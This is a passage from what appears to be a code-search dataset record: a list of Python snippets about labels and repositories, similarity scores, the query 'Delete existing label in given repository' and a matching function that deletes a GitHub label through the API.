object_type='Assessment')\n response = self.api.put(self.assessment, {'labels': [{\n \"name\": label_new.name,\n \"id\": label_new.id\n }]})\n self.assert200(response)\n notifs, notif_data = common.get_daily_notifications()\n updated = notif_data[\"[email protected]\"][\"assessment_updated\"]\n self.assertEqual(len(notifs), 1)\n self.assertEqual(\n updated[self.assessment.id][\"updated_data\"][\"LABELS\"],\n (\"test_label\", \"\")\n )", "def add_label(self, new_name, status):\n api_uri = self._uri_dict.get('addLabel')\n data = {\n 'newName': new_name,\n 'status': status\n }\n r_data = self._post(api_uri, data)\n return r_data", "def update_tt_label(video: dict):\n # try to get all text tracks\n if tts := video.get('text_tracks'):\n # go through all tracks\n for track in tts:\n # change the setting\n track['label'] = track['srclang']\n\n # get the video ID\n video_id = video.get('id')\n # create the JSON body\n json_body = { 'text_tracks': tts }\n # make the PATCH call\n r = get_cms().UpdateVideo(video_id=video_id, json_body=json_body)\n # check if all went well\n if r.status_code in [200,202]:\n print(f'Updated track labels for video ID {video_id} with status {r.status_code}.')\n # otherwise report the error\n else:\n print(f'Error code {r.status_code} updating track labels for video ID {video_id}:')\n print(r.text)", "def test_issue_edit_label(self):\n pass", "def test_issue_add_label(self):\n pass", "def __updateRepoInManager(self, row, oldName):\n repoDict = self.dataDict(row)\n self.manager.removeKickstartRepository(self.currentProject, oldName)\n # pylint: disable-msg=W0142\n self.manager.addKickstartRepository(self.currentProject, **repoDict)\n self.manager.saveKickstartFile(self.currentProject)", "def update(tag_name: str):\n\n image_full_name = f\"{GITLAB_IMAGE_URL}:{tag_name}\"\n _build(tag_name=tag_name, image_full_name=image_full_name)\n _test(image_full_name=image_full_name)\n _upload(tag_name=tag_name, image_full_name=image_full_name)", "def setLabel(*args):", "def setLabel(*args):", "def setLabel(*args):", "def setLabel(*args):", "def setLabel(*args):", "def test_job_save_label_update(self, lookup_users_mock, elasticsearch_update_mock):\n from bilbyui.models import BilbyJob, Label\n\n label1 = Label.objects.create(name=\"label 1\", description=\"my label 1\", protected=True)\n\n job = BilbyJob.objects.create(\n user_id=self.user.id,\n name=\"Test1\",\n description=\"first job\",\n job_controller_id=2,\n private=False,\n ini_string=create_test_ini_string({\"detectors\": \"['H1']\"}),\n )\n\n job.labels.add(label1)\n\n label1.name = \"label 2\"\n label1.save()\n\n # Update should have been called three times\n self.assertEqual(elasticsearch_update_mock.call_count, 3)\n\n self.assertDictEqual(\n elasticsearch_update_mock.mock_calls[-1].kwargs[\"doc\"], generate_elastic_doc(job, self.user)\n )", "def modify_labels(self, body, update_labels):\n for label_modifier in self.schema.get(\"labels\", []):\n\n # handle the service selector lookup\n spec = label_modifier.get(\"service\")\n if spec is not None:\n try:\n # get the service we're after\n service = self.k8s_inventory.k8s_client.get_service(\n name=spec.get(\"name\"),\n namespace=spec.get(\"namespace\"),\n )\n # reset the existing labels\n update_labels()\n # update with the selectors from the service\n update_labels(**service.spec.selector)\n except:\n return False\n\n # handle the static label modifications\n spec = label_modifier.get(\"label\")\n if spec is not None:\n updates = dict()\n updates[spec.get(\"key\")] = 
spec.get(\"value\")\n update_labels(**updates)\n\n return body", "def _update_label(self, change: Dict[str, Any]):\n dim = change['owner'].description\n coord = self.controls[dim]['coord'][dim, change['new']]\n self.controls[dim]['label'].value = coord_element_to_string(coord)", "def test_issue_remove_label(self):\n pass", "def pull_labels(self, org):\n pass", "def add_label(self, label_update):\n if not label_update in self.__labels:\n self.__labels.append(label_update)", "def post_issue_labels(repo, project, issue_number):\n issue_path = '%s/%s/issues/%d' % (repo, project, issue_number)\n\n new_label_ids = request.json\n\n current_label_ids = dao.get_issue_label_ids(issue_path)\n\n revised_label_ids = current_label_ids + new_label_ids\n\n dao.set_issue_label_ids(issue_path, revised_label_ids)\n\n return if_found(dao.get_issue_labels(issue_path))", "def setLabel(self, label):\r\n\t\tself.label = label", "def setLabel(self, label):\r\n\t\tself.label = label", "def setLabel(self, label):\r\n\t\tself.label = label", "def create_label(self, org, name):\n pass", "def add_labels(number, labels):\n\n cmds = [github_cli, 'pr', 'edit', str(number)]\n for lab in labels:\n cmds += ['--add-label', lab]\n\n with subprocess.Popen(cmds) as p:\n _, err = p.communicate()\n print(err)", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def setLabel2(*args):", "def patch_issue_labels(repo, project, issue_number):\n add_label_ids = request.json.get('addLabelIds') or []\n remove_label_ids = request.json.get('removeLabelIds') or []\n\n issue_path = '%s/%s/issues/%d' % (repo, project, issue_number)\n\n current_label_ids = dao.get_issue_label_ids(issue_path)\n\n revised_label_ids = [label_id for label_id in current_label_ids + add_label_ids\n if label_id not in remove_label_ids]\n\n dao.set_issue_label_ids(issue_path, revised_label_ids)\n\n return if_found(dao.get_issue_labels(issue_path))", "def test_issue_create_label(self):\n pass", "def update_repo_cli(api_client, repo_id, branch, tag, path):\n id_from_param_or_path = (repo_id if repo_id is not None\n else ReposApi(api_client).get_repo_id(path))\n content = ReposApi(api_client).update(id_from_param_or_path, branch, tag)\n click.echo(pretty_format(content))", "def EditLabel(self, item):\r\n \r\n self.Edit(item)", "def SetLabel(self, label):\r\n\r\n self.label = label", "def replace(self, labels):\r\n request = http.Request('PUT', self.get_url(), labels)\r\n\r\n return request, parsers.parse_json", "def UpdatePipelineToolStatusLabel( gui, statusMessage ):\n gui.pipelineToolStatusLabel.setText( statusMessage )", "def cmd_update(self):\n self.update_repository()\n results = self.results.getvalue()\n if results:\n print('---')\n print(results, end='')", "def rename_label(self, *args):\n return _ida_hexrays.vdui_t_rename_label(self, *args)", "def update(self, labels, preds):\n raise NotImplementedError()", "def addLabel(*args):", "def test_issue_delete_label(self):\n pass", "def on_save_label(self, image_id, label_id):\n logger.info(f\"New label saved for: 
{image_id} => {label_id}\")", "def labels_by_name(self, username, repository_name, access_token=None):\n return self._complete_request_by_name(\n username, repository_name, \"labels\", access_token)", "def update( self, trans, payload, **kwd ):\n repository_metadata_id = kwd.get( 'id', None )\n try:\n repository_metadata = metadata_util.get_repository_metadata_by_id( trans, repository_metadata_id )\n flush_needed = False\n for key, new_value in payload.items():\n if hasattr( repository_metadata, key ):\n old_value = getattr( repository_metadata, key )\n setattr( repository_metadata, key, new_value )\n if key in [ 'tools_functionally_correct', 'time_last_tested' ]:\n # Automatically update repository_metadata.time_last_tested.\n repository_metadata.time_last_tested = datetime.datetime.utcnow()\n flush_needed = True\n if flush_needed:\n trans.sa_session.add( repository_metadata )\n trans.sa_session.flush()\n except Exception, e:\n message = \"Error in the Tool Shed repository_revisions API in update: %s\" % str( e )\n log.error( message, exc_info=True )\n trans.response.status = 500\n return message\n repository_metadata_dict = repository_metadata.as_dict( value_mapper=default_value_mapper( trans, repository_metadata ) )\n repository_metadata_dict[ 'url' ] = web.url_for( controller='repository_revisions',\n action='show',\n id=trans.security.encode_id( repository_metadata.id ) )\n return repository_metadata_dict", "def update_label(\r\n self,\r\n root,\r\n label_var,\r\n text = \"\",\r\n delay = 2 #seconds\r\n ):\r\n label_var.set(text)\r\n root.update()\r\n time.sleep(delay)", "def labelUpdatedAction(self):\n text_to_update = self.lineEdit.text()\n\n if text_to_update != self.label.text():\n self.label.setText(text_to_update)\n self.textChanged.emit(text_to_update)\n\n self.label.setHidden(False)\n self.lineEdit.setHidden(True)\n self.lineEdit.blockSignals(True)\n self.label.blockSignals(False)", "def add_label_to_existing(hostname, new_labels):\n\n logging.debug('going to add labels %s to existing host %s' % (new_labels, hostname))\n\n checkmk_api_url = config['checkmk_api_url']\n checkmk_api_username = config['checkmk_api_username']\n checkmk_api_secret = config['checkmk_api_secret']\n checkmk_puppetdb_label = config['checkmk_puppetdb_label']\n\n # Save the attributes, save the ~world~ existing labels\n req_params = { 'action': 'get_host',\n '_username': config['checkmk_api_username'],\n '_secret': config['checkmk_api_secret'],\n 'hostname': hostname,\n 'output_format': 'json' }\n r = requests.post(checkmk_api_url, req_params)\n\n existing_labels = {}\n try:\n existing_labels.update(r.json()['result']['attributes']['labels'])\n except:\n pass\n\n # add new labels to existing labels and ensure from_puppetdb label present\n existing_labels.update(new_labels)\n existing_labels.update({ 'from_puppetdb': checkmk_puppetdb_label })\n\n payload = {'request': json.dumps({\n 'hostname': hostname,\n 'attributes': {\n 'labels': existing_labels\n }\n })}\n\n logging.debug('-- adding labels %s to host %s' % (existing_labels, hostname))\n r = requests.post(\"%s?action=edit_host&_username=%s&_secret=%s\" % (checkmk_api_url, checkmk_api_username, checkmk_api_secret), data=payload)\n logging.debug('-- got resp code = %d' % r.status_code)\n logging.debug('-- got resp text = %s' % r.text)\n r_json = json.loads(r.text)\n\n # Successful edit_host gives response of {\"result\": null, \"result_code\": 0}\n if r_json['result_code'] == 0 and r_json['result'] is None:\n logging.info('added labels %s to %s 
successfully' % (existing_labels, hostname))\n else:\n logging.warn('failed to add labels %s to host %s' % (r_json['result'], hostname))", "def set_label(self, mp, dn):\n for p in self.partition_list:\n if p[0] == mp:\n p[3] = dn", "def add_label(self, label):\n if not self.has_label(label):\n self.add_category(scheme=LABELS_SCHEME,\n term='%s#%s' % (LABELS_NS, label),\n label=label)", "def label(self, label: str):\n\n self._label = label", "def SetLabel(self, label):\r\n\r\n self._label = label", "def update_notebook(self, model, name, path=''):\n\t\tnew_name = model.get('name', name)\n\t\tnew_path = model.get('path', path)\n\t\tif path != new_path or name != new_name:\n\t\t self.rename_notebook(name, path, new_name, new_path)\n\t\tmodel = self.get_notebook(new_name, new_path, content=False)\n\t\treturn model", "def run(self):\n self.update_repos()", "def set_label(self, label_config):\n self.label_config = label_config", "def test_heads_setitem_existing(repository: Repository) -> None:\n head, heads = repository.head, repository.heads\n heads[\"branch\"] = head.commit\n updatefile(repository.path / \"file\")\n heads[\"branch\"] = head.commit\n assert head.commit == heads[\"branch\"]", "def _set_label(self, input_label):\n self.label = input_label\n return self.label", "def update(self, request, pk=None):\n if not request.auth.user.is_staff:\n return Response(\n {'message': 'You must be an admin to update categories.'},\n status=status.HTTP_403_FORBIDDEN\n )\n\n # Do mostly the same thing as POST, but instead of\n # creating a new instance of Category, get the Category record\n # from the database whose primary key is `pk`\n category = Categories.objects.get(pk=pk)\n category.label = request.data[\"label\"]\n \n\n category.save()\n\n # 204 status code means everything worked but the\n # server is not sending back any data in the response\n return Response({}, status=status.HTTP_204_NO_CONTENT)", "def update_mirror(self, repo, body):\n url = self._repo_url(repo, other='/mirror')\n response = self.rest.put(url)\n\n if response.status_code is not 200:\n self.module.fail_json(msg=response.info)\n return response.info", "def __add_new_label(self, name, value):\n self.__labels_dict[name] = value", "def label(self, value):\n\t\tself._label = value", "def patch_repos(self):", "def edit_address(self, new_label: str) -> None:\n self.address_form.label_input.fill(new_label)\n self.address_form.save_button.click()", "def set_label(self, label):\n self._remove_child_widget(self._label)\n self._add_child_widget(label)\n self._label = label\n self.update(self._label)", "def _update_head(self, index_entry, branch, new_id):\r\n index_entry['versions'][branch] = new_id\r\n self.db_connection.update_course_index(index_entry)", "def set_label(self, key: str, value: str):\n self.labels[key] = value" ]
[ "0.6681116", "0.6653021", "0.64337254", "0.6265893", "0.62407804", "0.6226869", "0.61520106", "0.6127353", "0.61121166", "0.61037016", "0.6094828", "0.603661", "0.60320926", "0.59240484", "0.59008676", "0.58834106", "0.58732027", "0.5860932", "0.5839947", "0.58363944", "0.5802565", "0.5790831", "0.57733464", "0.5766619", "0.5702953", "0.57003826", "0.5630814", "0.5615852", "0.55864763", "0.5586208", "0.55831957", "0.555776", "0.5546136", "0.5537413", "0.54940754", "0.5470725", "0.5470725", "0.5470725", "0.5470725", "0.5470725", "0.54380965", "0.54193985", "0.5413148", "0.5409756", "0.5404242", "0.53837293", "0.53681153", "0.53585047", "0.53585047", "0.53585047", "0.5329807", "0.5318072", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.5301767", "0.5298573", "0.5297823", "0.5280904", "0.5280097", "0.5263627", "0.5262987", "0.523742", "0.52269125", "0.5213891", "0.5208803", "0.5185721", "0.5182142", "0.51768833", "0.5176376", "0.5174705", "0.5173992", "0.5157908", "0.51414376", "0.51409745", "0.5136574", "0.5132685", "0.5127844", "0.5125647", "0.51244795", "0.5108005", "0.50935626", "0.50909394", "0.5088174", "0.5083873", "0.508309", "0.5078021", "0.50771505", "0.5076118", "0.5072969", "0.5071869", "0.50689673" ]
0.72466385
0
Delete existing label in given repository
def delete_label(self, repository, name, **kwargs): response = self.session.delete( '{}/repos/{}/labels/{}'.format( self.GH_API_ENDPOINT, repository, name ) ) if response.status_code != 204: raise GitHubError(response)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_issue_delete_label(self):\n pass", "def delete(ctx: click.Context, repository_path):\n root_commands.cmd_delete(ctx.obj, repository_path)", "def repository_delete(ctx: click.Context, repository_name):\n subcommand_repository.cmd_delete(ctx.obj, repository_name)", "def delete_label(id):\n dao.delete_label(id)\n return jsonify(dao.get_label(id))", "def delete_issue_label(repo, project, issue_number, delete_label_id):\n issue_path = '%s/%s/issues/%d' % (repo, project, issue_number)\n\n current_label_ids = dao.get_issue_label_ids(issue_path)\n\n revised_label_ids = [label_id for label_id in current_label_ids\n if label_id != delete_label_id]\n\n dao.set_issue_label_ids(issue_path, revised_label_ids)\n\n return if_found(dao.get_issue_labels(issue_path))", "def test_issue_remove_label(self):\n pass", "def delete(repo):\n print('Repo: %s' % repo)\n print('Deleted')", "def delete_label(self, label_id: str):\n return delete_label(self.api_key, label_id)", "def delete_code_repository(CodeRepositoryName=None):\n pass", "def delete(self, label):\n if label in self.bindings:\n if not self.locked:\n i = self.bindings[label]\n del self.bindings[label]\n return i\n else:\n if self.parent:\n return self.parent.delete(label)\n else:\n raise SnekEvaluationError('attempting to delete non-existing name {}'.format(label))", "async def removed_label(event, gh, *args, **kwargs):\n if event.data[\"label\"][\"name\"] == TRIVIAL_LABEL:\n await set_status(event, gh)", "def delete_manifest_label(label_uuid, tag_manifest):\n\n # Find the label itself.\n label = get_manifest_label(label_uuid, tag_manifest)\n if label is None:\n return None\n\n if not label.source_type.mutable:\n raise DataModelException(\"Cannot delete immutable label\")\n\n # Delete the mapping records and label.\n (TagManifestLabelMap.delete().where(TagManifestLabelMap.label == label).execute())\n\n deleted_count = TagManifestLabel.delete().where(TagManifestLabel.label == label).execute()\n if deleted_count != 1:\n logger.warning(\"More than a single label deleted for matching label %s\", label_uuid)\n\n deleted_count = ManifestLabel.delete().where(ManifestLabel.label == label).execute()\n if deleted_count != 1:\n logger.warning(\"More than a single label deleted for matching label %s\", label_uuid)\n\n label.delete_instance(recursive=False)\n return label", "def remove(self, label):\n\n\t\t\tself[label].remove()", "def _del_label(self):\n label = self.combobox.currentText()\n if label:\n button = QMessageBox.warning(self, \"Delete label\", \n \"Are you sure that you want to delete label %s ?\" % label,\n QMessageBox.Yes,\n QMessageBox.No)\n if button == QMessageBox.Yes:\n self._label_config.remove_label(str(label))\n self._update_combobox()", "def delete_label(self, label_key):\n # type: (str) -> bool\n headers = Headers({\"content-type\": \"application/json\", \"accept\": \"application/json\"})\n response_result = self.connection.api_call(\n \"DELETE\",\n [\"v1\", \"datasets\", self.dataset_id, \"resources\", self.id, \"labels\", label_key],\n headers=headers,\n )\n\n if response_result:\n # Sync the latest data from API to prevent inconsistency\n self.refresh()\n\n return True", "def remove_labels(number, labels):\n\n cmds = [github_cli, 'pr', 'edit', str(number)]\n for lab in labels:\n cmds += ['--remove-label', lab]\n\n with subprocess.Popen(cmds) as p:\n _, err = p.communicate()\n print(err)", "def remove_label(self, label):\n for category in self.get_categories(LABELS_SCHEME):\n if category.label == label:\n 
self.category.remove(category)", "def RemoveLabel(self, label):\n if self.labels is None:\n self.labels = set()\n else:\n try:\n self.labels.remove(label)\n except KeyError:\n pass", "def delete_metering_label(self, label):\r\n return self.delete(self.metering_label_path % (label))", "def remove(self: TokenMatcher, label: str) -> None:\n try:\n del self._patterns[label]\n del self._callbacks[label]\n except KeyError:\n raise ValueError(\n f\"The label: {label} does not exist within the matcher rules.\"\n )", "def test_delete_metering_label(self):\r\n resource = 'metering_label'\r\n cmd = metering.DeleteMeteringLabel(\r\n test_cli20.MyApp(sys.stdout), None)\r\n myid = 'myid'\r\n args = [myid]\r\n self._test_delete_resource(resource, cmd, myid, args)", "def _simple_deletion(self, operation, labels):\r\n label_strings = []\r\n for label in labels:\r\n if inspect.isclass(label) and issubclass(label, Edge):\r\n label_string = label.get_label()\r\n elif isinstance(label, Edge):\r\n label_string = label.get_label()\r\n label_strings.append(label_string)\r\n\r\n return self._delete_related(operation, label_strings)", "def __delitem__(self, doc_label):\n if doc_label not in self.docs:\n raise KeyError('document `%s` not found in corpus' % doc_label)\n del self.docs[doc_label]", "def remove_label(self, key: str):\n del self.labels[key]", "def delete(connection, rid=None, repo=None):\n\n if repo is None:\n repo = Repository(connection, rid)\n\n return repo.delete()", "def delete(self):\n\n lod_history = self.repo._get_lod_history(self.lod)\n assert lod_history.exists()\n lod_history.update(self.repo._youngest, None)\n self._mark_deleted()", "def test_heads_delitem_pass(repository: Repository) -> None:\n head, heads = repository.head, repository.heads\n heads[\"branch\"] = head.commit\n del heads[\"branch\"]\n assert \"branch\" not in heads", "def __gitDeleteBranch(self):\n self.vcs.gitDeleteRemoteBranch(self.project.getProjectPath())", "def delete_tag(tag, directory=None):\n execute_command('git tag -d {0}'.format(tag), shell=True, cwd=directory)", "def fusion_api_delete_repository(self, uri, api=None, headers=None):\n return self.repository.delete(uri=uri, api=api, headers=headers)", "def rm_task():\n # get task label from user\n responses = accept_inputs([\"Task label\"])\n label = responses[\"Task label\"]\n # check for existence of task\n results = query_with_results(\"select * from task where label = ?\", [label])\n if len(results) == 0:\n print(\"No task found with label '%s' that we could remove.\" % label)\n return\n # the task exists, so remove it\n query_no_results(\"delete from task where label = ?\", [label]) \n # remove all person associations\n query_no_results(\"delete from task_person_pair where task = ?\", [label])\n print(\"Task with label '%s' removed.\" % label)", "def execute(self: \"DeleteBranchOperator\", context: Dict[str, Any]) -> Any:\n hook = NessieHook(conn_id=self.conn_id)\n\n hook.delete_reference(self.branch)", "def delete_branch(api_access_token: str, repo: str, ref: str) -> response.Response:\n api = github.Github(api_access_token)\n\n repository = api.get_repo(repo)\n repository_ref = repository.get_git_ref('heads/{}'.format(ref))\n repository_ref.delete()\n\n return response.success('Successfully deleted \"{}\" from repository \"{}\"'.format(ref, repo))", "def remove_label(self, ):\n if self.AttributeNames.LABEL in self.attrs:\n del self.attrs[self.AttributeNames.LABEL]\n return self", "def test_networking_project_network_tag_delete(self):\n pass", "def delete(self, 
git_repo_id: int):\n self.datastore.delete(document_id=git_repo_id)\n return None, 204", "def removeRepository(self, name):\n self.manager.removeKickstartRepository(self.currentProject, name)\n self.manager.saveKickstartFile(self.currentProject)\n self.refresh()", "def delete_from_repo(self, interest):\n# co_name = self.parse_co_name(interest.getName())\n\n # by name prefix\n # by interest\n # find last node according to given name prefix\n last_node = self.locate_last_node(interest.getName())\n if not last_node:\n return None\n\n # apply selectors here. AT MOST one node shall be left \n nodes = self.apply_selectors(last_node, interest)\n if not nodes:\n return None\n\n _ids = []\n for node in nodes:\n node.isolate()\n node.delete()", "def delete(self):\n if not hasattr(self, 'id'):\n raise BadReference('No matching issue on disk')\n shutil.rmtree(self.paths['root'])", "def test_issue_clear_labels(self):\n pass", "def delete(self, name):\n err = C.git_remote_delete(self._repo._repo, to_bytes(name))\n check_error(err)", "def delete_entity(self, context, lb_obj):\n resource_path = \"%s/%s/%s\" % (RESOURCE_PREFIX, LBS_RESOURCE, lb_obj.id)\n msg = _(\"NetScaler driver lb_obj removal: %s\") % lb_obj.id\n LOG.debug(msg)\n self.client.remove_resource(context.tenant_id, resource_path)", "def removeLabelFromPage(self, label, page):\n return self.pm_getSpaceManager().removeLabelFromPage(self._unbox(label), self._unbox(page))", "def remove(self):\n print \"*** Removing repository '%s'\" % self.destination\n shutil.rmtree(self.destination)\n self.destination = None", "def delInfo(label: str):\r\n\r\n if not self.isClosed:\r\n if label in self.__identity_info.keys():\r\n del self.__identity_info[label]\r\n else:\r\n raise HDDOPermissionException('Tried to delete non-existing identity information in a HealthDominoDataObject.')\r\n else:\r\n raise HDDOPermissionException('Tried to delete identity information from a closed HealthDominoDataObject.')", "def delete_branch(self):\n for p in self.get_branch():\n if p.kind == 'image':\n self.get(p.uid).delete_image()\n else: \n # delete related tags\n for t in self.Tag.list(page=p.uid):\n t.delete()\n # delete page \n p.delete()", "def delete(self, name):\n if (self.model_dir / (str(name) + '.pkl')).exists():\n (self.model_dir / (str(name) + '.pkl')).unlink()", "def delData(self, label):\n\n return self._data.pop(label, None)", "def delete_repository(repository_id):\n user = get_jwt_identity()\n repository = Repository.query.get_by_id(repository_id, user)\n if repository is None:\n raise ApiException(400, \"No module with this id was found.\")\n if str(repository.owner_id) != user['id']:\n raise ApiException(400, \"Not enough permissions for this action.\")\n repository.delete()\n app.db.session.commit()\n return jsonify()", "def delete_inE(self, *labels):\r\n self._simple_deletion('inE', labels)", "def branch_delete(request, branch_id):\n branch = models.Branch.get_by_id(int(branch_id))\n if branch.owner != request.user:\n return HttpTextResponse('You do not own this branch', status=403)\n\n repo_key = branch.repo_key\n branch.key.delete()\n num_branches = models.Branch.query(models.Branch.repo_key == repo_key).count()\n if not num_branches:\n # Even if we don't own the repository? Yes, I think so! 
Empty\n # repositories have no representation on screen.\n repo_key.delete()\n\n return HttpResponseRedirect(reverse(repos))", "def delete_entity(self, context, pool):\n resource_path = \"%s/%s/%s\" % (RESOURCE_PREFIX, POOLS_RESOURCE,\n pool.id)\n msg = _(\"NetScaler driver pool removal: %s\") % pool.id\n LOG.debug(msg)\n self.client.remove_resource(context.tenant_id, resource_path)", "def _simple_deletion(self, operation, labels):\n from mogwai.models.edge import Edge\n\n label_strings = []\n for label in labels:\n if inspect.isclass(label) and issubclass(label, Edge):\n label_string = label.get_label()\n elif isinstance(label, Edge):\n label_string = label.get_label()\n elif isinstance(label, string_types):\n label_string = label\n else:\n raise MogwaiException('traversal labels must be edge classes, instances, or strings')\n label_strings.append(label_string)\n\n future = connection.future_class()\n future_result = self._delete_related(operation, label_strings)\n\n def on_read(f2):\n try:\n result = f2.result()\n except Exception as e:\n future.set_exception(e)\n else:\n future.set_result(result)\n\n def on_save(f):\n try:\n stream = f.result()\n except Exception as e:\n future.set_exception(e)\n else:\n future_read = stream.read()\n future_read.add_done_callback(on_read)\n\n future_result.add_done_callback(on_save)\n\n return future", "def delete():", "def delete_notebook(self, name, path=''):\n\t\tos_path = self._get_os_path(name, path)\n\t\tif not key_exists(self.bucket, os_path):\n\t\t\traise web.HTTPError(404, u'Notebook does not exist: %s' % os_path)\n\n\t\t# clear checkpoints\n\t\tfor checkpoint in self.list_checkpoints(name, path):\n\t\t\tcheckpoint_id = checkpoint['id']\n\t\t\tcp_path = self.get_checkpoint_path(checkpoint_id, name, path)\n\t\t\tif key_exists(self.bucket, cp_path):\n\t\t\t\tself.log.debug(\"Unlinking checkpoint %s\", cp_path)\n\t\t\t\tself.bucket.delete_key(cp_path)\n\n\t\tself.log.debug(\"Unlinking notebook %s\", os_path)\n\t\tself.bucket.delete_key(os_path)", "def delete(self, namespace_name, repository_name, username):\n try:\n model.delete_repo_permission_for_user(username, namespace_name, repository_name)\n except DeleteException as ex:\n raise request_error(exception=ex)\n\n log_action(\n \"delete_repo_permission\",\n namespace_name,\n {\"username\": username, \"repo\": repository_name, \"namespace\": namespace_name},\n repo_name=repository_name,\n )\n\n return \"\", 204", "def do_command(self, args):\n imageops = dbops.Images()\n imageops.delete(args)", "def test_collection_delete(repository_collection, faker):\n x_name = faker.word()\n\n repository_collection.delete(x_name)\n\n repository_collection.client.scripts.create_if_missing.assert_called_once()\n repository_collection.client.scripts.run.assert_called_with(\n 'nexus3-cli-repository-delete', data=x_name)", "def svn_fs_delete(*args):\r\n return _fs.svn_fs_delete(*args)", "def delete_tag(self,tag):\r\n\r\n # with shelf\r\n if self.using_shelf:\r\n del self.tag_dict[tag]", "def delete_command(arguments: List[str]) -> None:\n if len(arguments) != 2:\n print('Required 1 argument for create command') # noqa: WPS421\n return\n token = token_load.load()\n logic.delete(token, gist_id=arguments[1])", "def delete_command():\n global selected_tuple\n backend.delete(selected_tuple[0])", "def on_delete_repository(self, repo):\n installation = self.get_installation(repo.integration_id,\n repo.organization_id)\n client = installation.get_client()\n try:\n client.delete_project_webhook(\n 
repo.config['project_id'],\n repo.config['webhook_id'])\n except ApiError as e:\n if e.code == 404:\n return\n installation.raise_error(e)", "def delete(obj, path, ignore_missing=False):\n return glom(obj, Delete(path, ignore_missing=ignore_missing))", "def remove_recog_label(self, event):\n\t\tc=self.seqframe\n\t\tc.delete('recogseqlabel')\n\t\treturn", "def delete_entry(results):\n repo_ids = [str(item['id']) for item in results]\n repo_ids = \",\".join(repo_ids)\n sql = \"DELETE FROM python_repos where repo_id in (:ids)\".replace(\":ids\",repo_ids)\n db = get_db()\n cursor = db.execute(sql)\n db.commit()", "def delete_namespaces_with_label(self, label_selector):\n return [\n self.core_client.delete_namespace(namespace.metadata.name)\n for namespace in self.get_namespaces(label_selector=label_selector).items\n ]", "def remove_tag(tag):\n check_call(['git', 'tag', '-d', tag])", "def __init__(self, datastoreio_stub, label=None):\n super(DeleteModels, self).__init__(label=label)\n self.datastoreio = datastoreio_stub", "def _label_language_delete(self, languagename, langs,\n curr_lang, name_exists):\n chrdict = self._chrdict\n varlist = self._varlist\n \n # shorten language list\n langs = [lang for lang in langs if lang != languagename]\n \n if languagename == curr_lang:\n vlblist = self._vlblist\n lbllist = self._lbllist\n \n curr_lang = langs[0]\n if not self._quiet:\n msg = \"{}(language {} now current language)\"\n print(msg.format(\"{txt}\" if IN_STATA else \"\", curr_lang))\n \n varlab_key = \"_lang_v_\" + curr_lang\n vallab_key = \"_lang_l_\" + curr_lang\n \n # replace data label, _lang_list, and _lang_c\n dta_dict = chrdict[\"_dta\"]\n dta_dict[\"_lang_c\"] = curr_lang\n dta_dict[\"_lang_list\"] = \" \".join(langs)\n if varlab_key in dta_dict:\n self._data_label = dta_dict.pop(varlab_key)\n \n # Stata does not drop value label\n \n # Replace variable and value labels, \n # and pop these entries from chrdict.\n # If this leaves a chrdict[varname] empty, delete it.\n for varname, i in zip(varlist, range(self._nvar)):\n lbllist[i] = '' \n # Next line probably not necessary. 
\n # There should be a var label in chrdict, \n # even if it's empty str.\n vlblist[i] = ''\n if varname in chrdict:\n var_dict = chrdict[varname]\n if varlab_key in var_dict:\n vlblist[i] = var_dict.pop(varlab_key)\n if vallab_key in var_dict:\n lbllist[i] = var_dict.pop(vallab_key)\n if len(var_dict) == 0:\n del chrdict[varname]\n \n # if deleted language is not the current language, \n # delete entries from chrdict\n else:\n varlab_key = \"_lang_v_\" + languagename\n vallab_key = \"_lang_l_\" + languagename\n \n # delete data label (if necessary) and replace _lang_list\n dta_dict = chrdict[\"_dta\"]\n dta_dict[\"_lang_list\"] = \" \".join(langs)\n if varlab_key in dta_dict:\n del dta_dict[varlab_key]\n \n # Stata does not drop value label\n \n # Delete variable and value label entries from chrdict.\n # If this leaves the sub-dictionary empty, delete it.\n for varname, i in zip(varlist, range(self._nvar)):\n if varname in chrdict:\n var_dict = chrdict[varname]\n if varlab_key in var_dict:\n del var_dict[varlab_key]\n if vallab_key in var_dict:\n del var_dict[vallab_key]\n if len(var_dict) == 0:\n del chrdict[varname]", "def delete_inE(self, *labels):\n return self._simple_deletion('inE', labels)", "def delete(self):\n ...", "def delete_pod_in_a_namespace(self, namespace, name, label_selector=\"\"):\n api_response = None\n try:\n api_response = self.ocp_pods.delete(namespace=namespace, name=name, label_selector=label_selector)\n except ApiException as e:\n logger.error(\"Exception deleting pod: %s\\n\", e)\n return api_response", "def delete(self, src):\n\n if self.noop:\n logger.info(\"No-Op Delete: %s.tar\" % self.bucket + src)\n else:\n logger.info(\"Trying to delete %s.tar\" % self.bucket + src)\n self.client.delete(self.bucket + src + \".tar\")", "def delete(self, tree_path):\n\t\traise NotImplementedError", "def delete_taggit_tags(apps, schema_editor):\n TaggitTag = apps.get_model('taggit', 'Tag')\n TaggitTag.objects.all().delete()", "def delete(log, args):\n log('dataset id: {highlight}{id}{reset}',\n highlight=Fore.GREEN,\n id=args.id,\n reset=Style.RESET_ALL)\n log.warn('delete dataset command coming soon.')", "def unlabel_messages(self, org, messages, label):\n pass", "def remove(self,\n label: str,\n **kwargs) -> AddressBookEntryModel:\n request_model = RemoveRequest(label=label)\n data = self.delete(request_model, **kwargs)\n data['address'] = Address(address=data['address'], network=self._network)\n return AddressBookEntryModel(**data)", "def remove_from_repository(user_id):\n try:\n repository.delete_by_id(user_id)\n except KeyError:\n raise", "def delete(self):\n self.parser.add_argument('lp_id',\n help=\"Language pack id\")\n args = self.parser.parse_args()\n self.client.languagepacks.delete(lp_id=args.lp_id)", "def svn_fs_delete_berkeley(*args):\r\n return _fs.svn_fs_delete_berkeley(*args)", "def removeLabelFromSpace(self, label, space):\n return self.pm_getSpaceManager().removeLabelFromSpace(self._unbox(label), self._unbox(space))", "def clearLabelMap(self,label=None):\r\n # productive\r\n profprint()\r\n widget = slicer.modules.NeedleFinderWidget\r\n print \"clearing label map\"\r\n self.undoRedo.saveState()\r\n labelImage = self.labelMapNode.GetImageData()\r\n shape = 